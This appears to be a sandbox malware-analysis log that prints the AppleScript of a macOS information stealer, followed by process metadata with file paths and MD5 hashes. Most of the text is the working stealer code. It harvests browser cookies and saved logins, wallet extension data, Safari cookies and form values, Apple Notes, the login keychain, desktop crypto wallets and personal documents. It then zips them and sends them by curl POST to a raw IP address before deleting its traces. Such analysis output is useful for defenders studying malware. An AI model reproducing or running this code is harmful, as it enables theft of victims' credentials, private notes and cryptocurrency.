'ffbceckpkpbcmgiaehlloocglmijnpmp', 'kfdniefadaanbjodldohaedphafoffoh', 'bedogdpgdnifilpgeianmmdabklhfkcn', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'opcgpfmipidbgpenhmajoajpbobppdil', 'mmmjbcfofconkannjonfmjjajpllddbg', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ejjladinnckdgjemekebdpeokbikhfci', 'kkpllkodjeloidieedojogacfhpaihoh', 'apnehcjmnengpnmccpaibjmhhoadaico', 'jiepnaheligkibgcjgjepjfppgbcghmp', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'idpdilbfamoopcfofbipefhmmnflljfi', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ilhaljfiglknggcoegeknjghdgampffk', 'pfccjkejcgoppjnllalolplgogenfojk', 'cnmamaachppnkjgnildpdmkaakejnhae', 'eajafomhmkipbjmfmhebemolkcicgfmd', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'hifafgmccdpekplomjjkcfgodnhcellj', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bcopgchhojmggmffilplmbdicgaihlkp', 'cmoakldedjfnjofgbbfenefcagmedlga', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'ibljocddagjghmlpgihahamcghfggcjc', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'kbdcddcmgoplfockflacnnefaehaiocb', 'cgeeodpfagjceefieflmdfphplkenlfk', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'fdchdcpieegfofnofhgdombfckhbcokj', 'gjlmehlldlphhljhpnlddaodbjjcchai', 'ellkdbaphhldpeajbepobaecooaoafpg', 'ojbcfhjmpigfobfclfflafhblgemeidi', 'ghlmndacnhlaekppcllcpcjjjomjkjpg', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'pdliaogehgdbhbnmkklieghmmjkpigpa', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'jfdlamikmbghhapbgfoogdffldioobgl', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'cflgahhmjlmnjbikhakapcfkpbcmllam', 'keenhcnmdmjjhincpilijphpiohdppno', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'bcenedbpaaegpnijoadpdjiachahncdg', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'cjookpbkjnpkmknedggeecikaponcalb', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'dngmlblcodfobpdpecaadgfbcggfjfnm', 'jnldfbidonfeldmalbflbmlebbipcnle', 'ehjiblpccbknkgimiflboggcffmpphhp', 'agoakfejjabomempkjlepdflaleeobhb', 'fopmedgnkfpebgllppeddmmochcookhc', 'dmkamcknogkgcdfhhbddcghachkejeap', 'iglbgmakmggfkoidiagnhknlndljlolb', 'opfgelmcmbiajamepnmloijbpoleiama', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'gafhhkghbfjjkeiendhlofajokpaflmk', 'imlcamfeniaidioeflifonfjeeppblda', 'penjlddjkjgpnkllboccdgccekpkcbin', 'nhnkbkgjikgcigadomkphalanndcapjk', 'egjidjbpglichdcondbcbdnbeeppgdph', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'dldjpboieedgcmpkchcjcbijingjcgok', 'acmacodkjbdgmoleebolmdjonilkdbch', 'lccbohhgfkdikahanoclbdmaolidjdfl', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'gjagmgiddbbciopjhllkdnddhcglnemk', 'cnncmdhjacpkmjmkcafchppbnpnhdmon', 'mfgccjchihfkkindfppnaooecgfneiii', 'ieldiilncjhfkalnemgjbffmpomcaigi', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'loinekcabhlmhjjbocijdoimmejangoa', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bgpipimickeadkjlklgciifhnalhdjhe', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'aeachknmefphepccionboohckonoeemg', 'gdokollfhmnbfckbobkdbakhilldkhcj', 'jiiigigdinhhgjflhljdkcelcjfmplnd', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'fcckkdbjnoikooededlapcalpionmalo', 'mdnaglckomeedfbogeajfajofmfgpoae', 'ebfidpplhabeedpnhjnobghokpiioolj', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'epapihdplajcdnnkdeiahlgigofloibg', 'iokeahhehimjnekafflcihljlcjccdbe', 'cihmoadaighcejopammfbmddcmdekcje', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'kilnpioakcdndlodeeceffgjdpojajlo', 'abogmiocnneedmmepnohnhlijcjpcifd', 'bofddndhbegljegmpmnlbhcejofmjgbn', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'hdkobeeifhdplocklknbnejdelgagbao', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'lfmmjkfllhmfmkcobchabopkcefjkoip', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'anokgmphncpekkhclmingpimjmcooifb', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'momakdpclmaphlamgjcndbgfckjfpemp', 'akkmagafhjjjjclaejjomkeccmjhdkpa', 'ehgjhhccekdedpbkifaojjaefeohnoea', 'mkpegjkblkkefacfnmkajcjmabijhclg', 'mlhakagmgkmonhdonhkpjeebfphligng', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'jnmbobjmhlngoefaiojfljckilhhlhcj', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kppfdiipphfccemcignhifpjkapfbihd', 'hcjhpkgbmechpabifbggldplacolbkoh', 'flpiciilemghbmfalicajoolhkkenfel', 'mlbnicldlpdimbjdcncnklfempedeipj', 'cfbfdhimifdmdehjmkdobpcjfefblkjm', 'ocjobpilfplciaddcbafabcegbilnbnb', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'lnnnmfcpbkafcpgdilckhmhbkkbpkmid', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'lpilbniiabackdjcionkobglmddfbcjo', 'efbglgofoippbgcjepnhiblaibcnclgk', 'fhbohimaelbohpjbbldcngcnapndodjp', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'bocpokimicclpaiekenaeelehdjllofo', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'aflkmfhebedbjioipglgcbcmnbpgliof', 'mkchoaaiifodcflmbaphdgeidocajadp', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'lmkncnlpeipongihbffpljgehamdebgi', 'gjnckgkfmgmibbkoficdidcljeaaaheg', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'nknhiehlklippafakaeklbeglecifhad', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'phkbamefinggmakgklpkljjmgibohnba', 'lakggbcodlaclcbbbepmkpdhbcomcgkd', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'mdjmfdffdcmnoblignmgpommbefadffd', 'jblndlipeogpafnldhgmapagcccfchpi', 'hbbgbephgojikajhfbomhlmmollphcad', 'dpcklmdombjcplafheapiblogdlgjjlb', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'kmhcihpebfmpgmihbkipmjlmmioameka', 'kennjipeijpeengjlogfdjkiiadhbmjl', 'amkmjjmmflddogmhpjloimipbofnfjih', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'fmblappgoiilbgafhjklehhfifbdocee', 'heamnjbnflcikcggoiplibfommfbkjpj', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'omaabbefbmiijedngplfjmnooppbclkk', 'nhlnehondigmgckngjomcpcefcdplmgc', 'fiikommddbeccaoicoejoniammnalkfa', 'ejbidfepgijlcgahbmbckmnaljagjoll', 'glmhbknppefdmpemdmjnjlinpbclokhn', 'kncchdigobghenbbaddojjnnaogfppfj', 'hpclkefagolihohboafpheddmmgdffjm', 'ilolmnhjbbggkmopnemiphomhaojndmb', 'panpgppehdchfphcigocleabcmcgfoca'}set chromiumFiles to {'/Network/Cookies', '/Cookies', '/Web Data', '/Login Data', '/Local Extension Settings/', '/IndexedDB/'}repeat with chromium in chromium_mapset savePath to writemind & 'chromium/' & item 1 of chromium & '_'tryset fileList to list folder item 2 of chromium without invisiblesrepeat with currentItem in fileListif ((currentItem as string) is equal to 'Default') or ((currentItem as string) contains 'Profile') thenrepeat with CFile in chromiumFilesset readpath to (item 2 of chromium & currentItem & CFile)if ((CFile as string) is equal to '/Network/Cookies') thenset CFile to '/Cookies'end ifif ((CFile as string) is equal to '/Local Extension Settings/') thengrabPlugins(readpath, savePath & currentItem, pluginList, false)else if (CFile as string) is equal to '/IndexedDB/' thengrabPlugins(readpath, savePath & currentItem, pluginList, true)elseset writepath to savePath & currentItem & CFilereadwrite(readpath, writepath)end ifend repeatend ifend repeatend tryend repeatend chromiumon filegrabber()tryset destFolder to '/tmp/pizda/finder/'set destinationFolderPath to POSIX file destFolderset notesMedia to POSIX file (destFolder & 'NotesMedia/')set extensionsList to {'txt', 'pdf', 'docx', 'wallet', 'key', 'keys', 'doc', 'jpeg', 'png', 'kdbx'}set bankSize to 0set notesBankSize to 0set uuidString to do shell script 'system_profiler SPHardwareDataType | awk \'/UUID/ { print $3 }\''mkdir(destinationFolderPath)mkdir(notesMedia)tell application 'Finder'tryset safariFolderPath to (path to home folder as text) & 'Library:Cookies:'duplicate file (safariFolderPath & 'Cookies.binarycookies') to folder destinationFolderPath with replacingset name of result to 'saf1'end tryset safariFolder to ((path to library folder from user domain as text) & 'Containers:com.apple.Safari:Data:Library:Cookies:')tryduplicate file 'Cookies.binarycookies' of folder safariFolder to folder destinationFolderPath with replacingend tryset notesFolderPath to (path to home folder as text) & 'Library:Group Containers:group.com.apple.notes:'tryset notesFolder to folder notesFolderPathset notesFiles to {'NoteStore.sqlite', 'NoteStore.sqlite-shm', 'NoteStore.sqlite-wal'}repeat with aFile in notesFilestryduplicate (file aFile of notesFolder) to folder destinationFolderPath with replacingend tryend repeatend tryset notesAccountsPath to (notesFolderPath & 'Accounts:')tryset notesAccountsFolder to folder notesAccountsPathset notesAccountsFiles to every folder of notesAccountsFolderrepeat with nFile in notesAccountsFilesset notesMediaPath to notesAccountsPath & name of nFile & ':Media:'set notesMediaProfiles to every folder of (folder notesMediaPath)repeat with profileFolder in notesMediaProfilesset notesMediaProfilesPath to notesMediaPath & name of profileFolderset notesMediaProfileFiles to every folder of (folder notesMediaProfilesPath)repeat with notesUUID in notesMediaProfileFilesset noteIdFiles to every file of notesUUIDrepeat with notesIdFile in noteIdFilestryset fileSize to size of notesIdFile as textset notesBankSize to notesBankSize + fileSizeif notesBankSize < 12 * 1024 * 1024 thenduplicate notesIdFile to notesMedia with replacingelseexit repeatend ifend tryend repeatend repeatend repeatend repeatend trytryset safariFolderPath to (path to library folder from user domain as text) & 'Safari:'duplicate (file 'Form Values' of folder safariFolderPath) to destinationFolderPath with replacingend trytryset keychainFolder to (path to library folder from user domain as text) & 'Keychains:' & uuidStringduplicate folder keychainFolder to destinationFolderPath with replacingend trytryset desktopFiles to every file of desktopset documentsFiles to every file of folder 'Documents' of (path to home folder)set downloadsFiles to every file of folder 'Downloads' of (path to home folder)repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)set fileExtension to name extension of aFileif fileExtension is in extensionsList thenset fileSize to size of aFileif (bankSize + fileSize) < 10 * 1024 * 1024 thentryduplicate aFile to folder destinationFolderPath with replacingset bankSize to bankSize + fileSizeend tryelseexit repeatend ifend ifend repeatend tryend tellend tryend filegrabberon send_data(attempt)tryset result_send to (do shell script 'curl -X POST -H \'buildid: 28436ce126e642f78ac930fd45ac9c96\' -H \'username: vadim\' --data-binary @/tmp/out.zip http://185.147.124.212/log')on errorif attempt < 10 thendelay 60send_data(attempt + 1)end ifend tryend send_dataset profile to '/Users/' & usernameset writemind to '/tmp/pizda/'tryset result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')writeText(result, writemind & 'hardware')end tryset library to profile & '/Library/Application Support/'set password_entered to getpwd(username, writemind)delay 0.01set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}}set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, {'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'kc')if release thenreadwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')readwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')readwrite(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')readwrite(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')end ifif filegrabbers thenfilegrabber()end ifwriteText(username, writemind & 'user')set ff_paths to {{'Firefox', library & 'Firefox/Profiles/'}, {'Waterfox', library & 'Waterfox/Profiles/'}}repeat with gecko in ff_pathstryparseFF(item 1 of gecko, item 2 of gecko, writemind)end tryend repeatrepeat with deskwal in walletMapGrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)end repeatchromium(writemind, chromiumMap)do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'send_data(0)do shell script 'rm -r ' & writeminddo shell script 'rm /tmp/out.zip'
                                        File size:43232 bytes
                                        MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
                                        Start time (UTC):12:10:57
                                        Start date (UTC):14/03/2025
                                        Path:/usr/libexec/xpcproxy
                                        Arguments:-
                                        File size:44048 bytes
                                        MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                        Start time (UTC):12:10:58
                                        Start date (UTC):14/03/2025
                                        Path:/usr/libexec/firmwarecheckers/eficheck/eficheck
                                        Arguments:/usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
                                        File size:74048 bytes
                                        MD5 hash:328beb81a2263449258057506bb4987f